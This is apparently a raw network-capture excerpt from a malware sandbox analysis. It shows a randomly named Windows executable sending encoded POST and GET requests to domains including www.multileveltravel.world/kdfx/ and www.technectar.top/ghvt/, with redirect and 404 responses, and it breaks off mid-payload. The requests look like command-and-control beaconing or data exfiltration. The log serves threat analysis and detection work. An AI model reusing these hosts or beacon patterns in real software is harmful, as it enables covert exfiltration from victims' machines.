                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                          Sep 30, 2024 18:45:52.447935104 CEST404INHTTP/1.1 200 OK
                                                                                          Server: openresty
                                                                                          Date: Mon, 30 Sep 2024 16:45:52 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 264
                                                                                          Connection: close
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 67 48 43 58 6d 44 55 3d 58 55 31 73 68 31 58 74 4d 69 64 65 4a 64 63 73 76 51 38 34 39 53 77 64 7a 48 66 62 69 44 35 32 67 58 47 77 52 35 57 41 53 79 4a 31 74 6c 49 6e 79 71 63 39 49 54 54 73 39 38 31 6e 52 63 66 74 2f 52 4b 63 71 37 46 56 68 65 4d 58 4d 4e 36 7a 4a 6f 35 69 49 32 42 4a 45 4f 37 52 36 55 66 74 59 38 6a 64 77 77 73 50 4a 66 79 73 51 45 43 52 71 31 51 41 2f 4d 61 45 52 4b 64 5a 48 7a 43 35 66 77 3d 3d 26 47 68 39 3d 67 38 75 38 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?gHCXmDU=XU1sh1XtMideJdcsvQ849SwdzHfbiD52gXGwR5WASyJ1tlInyqc9ITTs981nRcft/RKcq7FVheMXMN6zJo5iI2BJEO7R6UftY8jdwwsPJfysQECRq1QA/MaERKdZHzC5fw==&Gh9=g8u8"}</script></head></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          21192.168.2.5497333.33.130.190801220C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Sep 30, 2024 18:45:57.488435030 CEST833OUTPOST /kdfx/ HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Host: www.multileveltravel.world
                                                                                          Origin: http://www.multileveltravel.world
                                                                                          Referer: http://www.multileveltravel.world/kdfx/
                                                                                          Content-Length: 208
                                                                                          Cache-Control: max-age=0
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                          Data Raw: 67 48 43 58 6d 44 55 3d 54 50 72 41 6b 55 2f 70 52 7a 30 62 35 75 4a 73 39 50 6d 30 6b 73 76 70 4f 50 47 58 77 57 49 49 44 2b 37 63 59 6e 37 76 49 51 54 77 35 6d 57 69 56 67 4e 4e 6f 36 4e 64 42 4b 52 61 58 4f 61 61 36 37 46 2f 67 4a 42 4d 79 7a 78 6e 63 48 69 56 49 75 5a 4d 53 45 67 6e 66 5a 56 34 70 30 35 30 6d 33 59 58 6c 6e 4b 45 50 58 2b 51 7a 4f 73 73 54 59 53 56 73 45 67 45 38 6b 6e 62 32 56 61 57 68 66 6d 75 62 36 47 5a 6e 7a 75 71 73 74 6f 6e 52 31 2b 31 72 6e 69 76 72 38 54 4b 4f 34 45 39 34 4b 64 32 38 67 58 41 79 33 57 50 78 67 2f 4c 33 56 4b 46 41 51 68 4c 6e 41 43 63 6a 64 44 4f 59 34 34 37 67 79 59 3d
                                                                                          Data Ascii: gHCXmDU=TPrAkU/pRz0b5uJs9Pm0ksvpOPGXwWIID+7cYn7vIQTw5mWiVgNNo6NdBKRaXOaa67F/gJBMyzxncHiVIuZMSEgnfZV4p050m3YXlnKEPX+QzOssTYSVsEgE8knb2VaWhfmub6GZnzuqstonR1+1rnivr8TKO4E94Kd28gXAy3WPxg/L3VKFAQhLnACcjdDOY447gyY=


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          22192.168.2.5497343.33.130.190801220C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Sep 30, 2024 18:46:00.042021990 CEST853OUTPOST /kdfx/ HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Host: www.multileveltravel.world
                                                                                          Origin: http://www.multileveltravel.world
                                                                                          Referer: http://www.multileveltravel.world/kdfx/
                                                                                          Content-Length: 228
                                                                                          Cache-Control: max-age=0
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                          Data Raw: 67 48 43 58 6d 44 55 3d 54 50 72 41 6b 55 2f 70 52 7a 30 62 34 4e 52 73 77 4d 4f 30 73 73 75 62 43 76 47 58 2b 32 49 79 44 2b 33 63 59 6c 57 6f 49 6a 6e 77 36 45 4f 69 55 6b 52 4e 70 36 4e 64 4b 71 52 66 59 75 61 42 36 37 49 63 67 4c 46 4d 79 7a 31 6e 63 47 53 56 49 5a 4e 50 64 30 67 6c 4b 4a 56 70 74 30 35 30 6d 33 59 58 6c 6e 33 76 50 58 6d 51 7a 66 38 73 54 38 4f 53 6c 6b 67 48 71 30 6e 62 6e 6c 61 53 68 66 6d 41 62 2f 75 7a 6e 32 71 71 73 76 77 6e 52 6b 2b 71 6c 6e 69 74 32 4d 53 31 4f 4c 68 4c 78 72 56 6d 35 6a 71 48 7a 42 4b 79 30 57 53 68 74 33 43 74 54 77 4e 7a 33 54 4b 72 79 74 69 6e 43 62 6f 4c 2b 6c 50 52 50 68 67 69 52 30 44 48 61 30 6c 6e 39 6d 57 36 6b 6a 70 64
                                                                                          Data Ascii: gHCXmDU=TPrAkU/pRz0b4NRswMO0ssubCvGX+2IyD+3cYlWoIjnw6EOiUkRNp6NdKqRfYuaB67IcgLFMyz1ncGSVIZNPd0glKJVpt050m3YXln3vPXmQzf8sT8OSlkgHq0nbnlaShfmAb/uzn2qqsvwnRk+qlnit2MS1OLhLxrVm5jqHzBKy0WSht3CtTwNz3TKrytinCboL+lPRPhgiR0DHa0ln9mW6kjpd


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          23192.168.2.5497353.33.130.190801220C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Sep 30, 2024 18:46:02.604048967 CEST1870OUTPOST /kdfx/ HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Host: www.multileveltravel.world
                                                                                          Origin: http://www.multileveltravel.world
                                                                                          Referer: http://www.multileveltravel.world/kdfx/
                                                                                          Content-Length: 1244
                                                                                          Cache-Control: max-age=0
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                          Data Raw: 67 48 43 58 6d 44 55 3d 54 50 72 41 6b 55 2f 70 52 7a 30 62 34 4e 52 73 77 4d 4f 30 73 73 75 62 43 76 47 58 2b 32 49 79 44 2b 33 63 59 6c 57 6f 49 6a 2f 77 36 33 47 69 56 44 6c 4e 7a 36 4e 64 57 36 52 65 59 75 61 41 36 37 68 56 67 4c 5a 36 79 78 64 6e 64 67 4f 56 4f 74 68 50 47 6b 67 6c 53 35 56 35 70 30 35 62 6d 30 67 4c 6c 6e 48 76 50 58 6d 51 7a 63 30 73 61 49 53 53 70 45 67 45 38 6b 6e 70 32 56 61 36 68 62 4c 39 62 2f 71 4a 6b 43 65 71 73 50 67 6e 54 57 57 71 74 6e 69 7a 33 4d 53 74 4f 4c 64 59 78 72 5a 71 35 69 4f 68 7a 47 75 79 31 44 66 51 36 57 71 4c 42 51 4a 58 34 54 37 4d 76 4a 4f 4a 50 4b 55 6d 36 31 44 2b 53 7a 39 4d 62 54 33 59 4f 77 6f 34 71 68 65 73 6c 30 59 52 55 77 42 65 32 70 6e 37 6e 71 62 49 32 30 42 38 64 67 6b 61 35 79 70 52 78 4e 51 4f 47 64 78 43 6f 76 47 78 6b 6a 39 2b 64 7a 57 65 79 71 44 39 43 37 58 64 68 77 62 4e 58 76 39 65 33 31 63 61 37 39 4f 6b 79 2f 6f 4e 32 4e 4f 61 41 77 36 55 4b 70 67 38 7a 6a 38 2b 75 30 4a 74 7a 5a 57 36 6c 75 34 58 37 73 47 5a 61 50 52 74 32 5a [TRUNCATED]
                                                                                          Data Ascii: gHCXmDU=TPrAkU/pRz0b4NRswMO0ssubCvGX+2IyD+3cYlWoIj/w63GiVDlNz6NdW6ReYuaA67hVgLZ6yxdndgOVOthPGkglS5V5p05bm0gLlnHvPXmQzc0saISSpEgE8knp2Va6hbL9b/qJkCeqsPgnTWWqtniz3MStOLdYxrZq5iOhzGuy1DfQ6WqLBQJX4T7MvJOJPKUm61D+Sz9MbT3YOwo4qhesl0YRUwBe2pn7nqbI20B8dgka5ypRxNQOGdxCovGxkj9+dzWeyqD9C7XdhwbNXv9e31ca79Oky/oN2NOaAw6UKpg8zj8+u0JtzZW6lu4X7sGZaPRt2ZwU1yTtTc7zKetoZzvFeYnhPDcfNNY0fvVFCCbuFPvUrkm5Yny9VZ05XwcVNtZtWPfQz2fSPPlm2BNU9fqiEE05dQgfJvIWAFS9lChYiM48m3+Ixbjy6/pSVBHQwBAhYCWdk/mDm1Tp8ktMMYVPkB0jXg4jp65PptdkvAY/OHVPFoS0F+i/IeVAPNHJNKVRBriIi9P3saoxF4NDiY6oTCcwE7OGCqyg6TVXUZ8KnHp+sC62zQV8H8kDq16fEuxj5tgqYxqQ1bM2ic7bJdlJymkPIVMtXh5gjj7/nAlxg2PJ0TAJeQxLFjTFcUldG7qJwlwFQjw2d74byn6ayw3qDzpZKGsezKz1tOs+jWH6RGjPn0ZBKs+9BYOJI5i4BFVIyiwfvHiTb4EzeBf1vHZ+eaYXtLy/v1st7PaQCLdFp/IgHMpioE+JDS945nG5bEb+2JaKQk/SngLClyxjvqQ/WJjlA2n327eejrWjN7b4lHmsTqGWESO27Wxj49gPQrImYnWV9UmTWiDvtFrqgEtSfBpZWQFcem72YSbKBPj3loTjhY5/06briDs7t3sgV90mvtqyQSmYCx+LH1l0XTUiGGksaUL+tBPrypiAH15jOVQ6BPrV00xiOWZGnFuIIsFoSceQ6x1/rmoeU8bx9p/aTWAJ8ZhbAQszQs04 [TRUNCATED]


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          24192.168.2.5497363.33.130.190801220C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Sep 30, 2024 18:46:05.251880884 CEST553OUTGET /kdfx/?gHCXmDU=eNDgnj/WfiIi0tdu+8aXiZOUK+7f3FxcWZT5SlTqKAn5yXi4RD1689oWOvV8Od+Oy+8ctbdx7DJ/alyTHONZQzsxT9MNlSdJwngJpwfGelD5vY9uXcKC+Fx9+CLw3WjCzw==&Gh9=g8u8 HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Host: www.multileveltravel.world
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                          Sep 30, 2024 18:46:06.630744934 CEST404INHTTP/1.1 200 OK
                                                                                          Server: openresty
                                                                                          Date: Mon, 30 Sep 2024 16:46:06 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 264
                                                                                          Connection: close
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 67 48 43 58 6d 44 55 3d 65 4e 44 67 6e 6a 2f 57 66 69 49 69 30 74 64 75 2b 38 61 58 69 5a 4f 55 4b 2b 37 66 33 46 78 63 57 5a 54 35 53 6c 54 71 4b 41 6e 35 79 58 69 34 52 44 31 36 38 39 6f 57 4f 76 56 38 4f 64 2b 4f 79 2b 38 63 74 62 64 78 37 44 4a 2f 61 6c 79 54 48 4f 4e 5a 51 7a 73 78 54 39 4d 4e 6c 53 64 4a 77 6e 67 4a 70 77 66 47 65 6c 44 35 76 59 39 75 58 63 4b 43 2b 46 78 39 2b 43 4c 77 33 57 6a 43 7a 77 3d 3d 26 47 68 39 3d 67 38 75 38 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?gHCXmDU=eNDgnj/WfiIi0tdu+8aXiZOUK+7f3FxcWZT5SlTqKAn5yXi4RD1689oWOvV8Od+Oy+8ctbdx7DJ/alyTHONZQzsxT9MNlSdJwngJpwfGelD5vY9uXcKC+Fx9+CLw3WjCzw==&Gh9=g8u8"}</script></head></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          25192.168.2.549737199.192.21.169801220C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Sep 30, 2024 18:46:12.244235992 CEST809OUTPOST /ghvt/ HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Host: www.technectar.top
                                                                                          Origin: http://www.technectar.top
                                                                                          Referer: http://www.technectar.top/ghvt/
                                                                                          Content-Length: 208
                                                                                          Cache-Control: max-age=0
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                          Data Raw: 67 48 43 58 6d 44 55 3d 47 52 4c 6b 54 6b 58 6b 74 74 6c 2b 62 2f 4f 77 50 46 30 34 35 70 65 74 6a 35 75 57 77 62 47 31 34 33 39 38 75 47 76 62 69 4f 75 61 72 4b 4e 75 6f 42 4f 70 31 77 5a 44 47 56 36 54 39 71 44 54 69 73 74 30 4a 58 69 6a 41 56 75 47 35 61 45 78 4d 47 30 42 68 2b 4a 69 41 33 73 72 62 34 68 4d 79 34 65 6d 77 4d 70 75 35 36 51 79 56 6c 59 6d 6e 5a 51 67 31 43 52 61 67 2f 71 2f 69 53 73 6f 32 46 54 44 30 65 59 41 58 39 4e 4b 4f 6a 43 57 50 32 48 51 37 53 52 76 71 79 35 42 33 33 2b 54 61 32 52 51 6c 70 2f 71 34 54 2f 79 6e 34 61 72 4c 4c 31 79 66 78 67 62 64 77 71 6a 61 6c 4a 47 31 37 64 2f 5a 45 67 3d
                                                                                          Data Ascii: gHCXmDU=GRLkTkXkttl+b/OwPF045petj5uWwbG14398uGvbiOuarKNuoBOp1wZDGV6T9qDTist0JXijAVuG5aExMG0Bh+JiA3srb4hMy4emwMpu56QyVlYmnZQg1CRag/q/iSso2FTD0eYAX9NKOjCWP2HQ7SRvqy5B33+Ta2RQlp/q4T/yn4arLL1yfxgbdwqjalJG17d/ZEg=
                                                                                          Sep 30, 2024 18:46:12.839900970 CEST980INHTTP/1.1 404 Not Found
                                                                                          Date: Mon, 30 Sep 2024 16:46:12 GMT
                                                                                          Server: Apache
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          Content-Length: 774
                                                                                          X-XSS-Protection: 1; mode=block
                                                                                          Connection: close
                                                                                          Content-Type: text/html
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          26192.168.2.549738199.192.21.169801220C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Sep 30, 2024 18:46:14.922312975 CEST829OUTPOST /ghvt/ HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Host: www.technectar.top
                                                                                          Origin: http://www.technectar.top
                                                                                          Referer: http://www.technectar.top/ghvt/
                                                                                          Content-Length: 228
                                                                                          Cache-Control: max-age=0
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                          Data Raw: 67 48 43 58 6d 44 55 3d 47 52 4c 6b 54 6b 58 6b 74 74 6c 2b 4b 73 57 77 49 6b 30 34 6f 5a 65 71 6d 35 75 57 37 37 47 35 34 33 68 38 75 44 58 78 33 6f 65 61 79 71 39 75 76 77 4f 70 79 77 5a 44 4e 31 37 62 35 71 44 55 69 73 68 4b 4a 53 4b 6a 41 56 36 47 35 62 30 78 4d 31 73 43 6e 75 4a 67 4b 6e 73 70 66 34 68 4d 79 34 65 6d 77 4d 39 45 35 36 49 79 56 31 6f 6d 6d 34 51 76 72 53 52 5a 6f 66 71 2f 6d 53 73 73 32 46 53 51 30 61 59 6d 58 2f 46 4b 4f 6a 53 57 50 44 6e 54 78 53 52 70 67 53 34 53 68 79 57 65 56 47 6b 63 68 50 79 37 35 31 2b 4d 76 75 33 42 52 70 39 61 4d 52 4d 6a 4e 6a 69 55 4c 56 6f 76 76 59 4e 50 48 54 31 33 4c 50 2b 58 74 58 31 48 69 63 65 54 38 58 70 73 63 4f 51 49
                                                                                          Data Ascii: gHCXmDU=GRLkTkXkttl+KsWwIk04oZeqm5uW77G543h8uDXx3oeayq9uvwOpywZDN17b5qDUishKJSKjAV6G5b0xM1sCnuJgKnspf4hMy4emwM9E56IyV1omm4QvrSRZofq/mSss2FSQ0aYmX/FKOjSWPDnTxSRpgS4ShyWeVGkchPy751+Mvu3BRp9aMRMjNjiULVovvYNPHT13LP+XtX1HiceT8XpscOQI
                                                                                          Sep 30, 2024 18:46:15.509844065 CEST980INHTTP/1.1 404 Not Found
                                                                                          Date: Mon, 30 Sep 2024 16:46:15 GMT
                                                                                          Server: Apache
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          Content-Length: 774
                                                                                          X-XSS-Protection: 1; mode=block
                                                                                          Connection: close
                                                                                          Content-Type: text/html
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          27192.168.2.549739199.192.21.169801220C:\Program Files (x86)\zwURcxVWXxjnCAvPjnSqwiXogtCyjtbvvRcdMeojwSVfxaoukHtpyvIPtHATKZvU\HAdkDWMZRiGMZe.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Sep 30, 2024 18:46:17.465114117 CEST1846OUTPOST /ghvt/ HTTP/1.1
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Host: www.technectar.top
                                                                                          Origin: http://www.technectar.top
                                                                                          Referer: http://www.technectar.top/ghvt/
                                                                                          Content-Length: 1244
                                                                                          Cache-Control: max-age=0
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                          Data Raw: 67 48 43 58 6d 44 55 3d 47 52 4c 6b 54 6b 58 6b 74 74 6c 2b 4b 73 57 77 49 6b 30 34 6f 5a 65 71 6d 35 75 57 37 37 47 35 34 33 68 38 75 44 58 78 33 72 2b 61 75 4c 64 75 6f 6a 32 70 7a 77 5a 44 52 6c 37 61 35 71 44 46 69 73 35 57 4a 53 47 64 41 57 43 47 72 70 38 78 48 6b 73 43 70 75 4a 67 45 33 73 6f 62 34 68 56 79 38 79 71 77 4d 74 45 35 36 49 79 56 32 77 6d 69 70 51 76 70 53 52 61 67 2f 71 7a 69 53 73 45 32 46 4c 6c 30 61 4d 32 58 75 6c 4b 4f 48 4f 57 63 41 50 54 39 53 52 72 6e 53 35 56 68 79 54 65 56 47 4a 74 68 50 76 73 35 79 79 4d 2b 76 32 74 45 4b 6c 6e 56 69 6f 35 42 43 36 59 52 78 77 6f 71 5a 31 76 50 43 45 51 45 2f 75 37 36 48 52 36 6b 6f 47 66 6e 69 31 6e 53 61 78 38 67 37 6d 39 4d 35 78 69 2b 62 43 4d 42 64 2f 4c 79 4d 72 2f 5a 6f 6c 47 72 6e 30 75 42 49 56 44 6e 7a 39 63 78 36 45 30 78 37 55 69 47 67 54 50 6f 33 51 68 51 78 34 47 42 4e 57 43 68 77 4d 48 7a 63 68 75 6f 63 38 71 5a 42 39 69 65 72 51 4b 4b 39 4a 4f 6a 59 38 36 64 63 61 72 35 77 75 54 2b 70 39 58 55 65 57 54 48 45 4a 78 6f 6c [TRUNCATED]
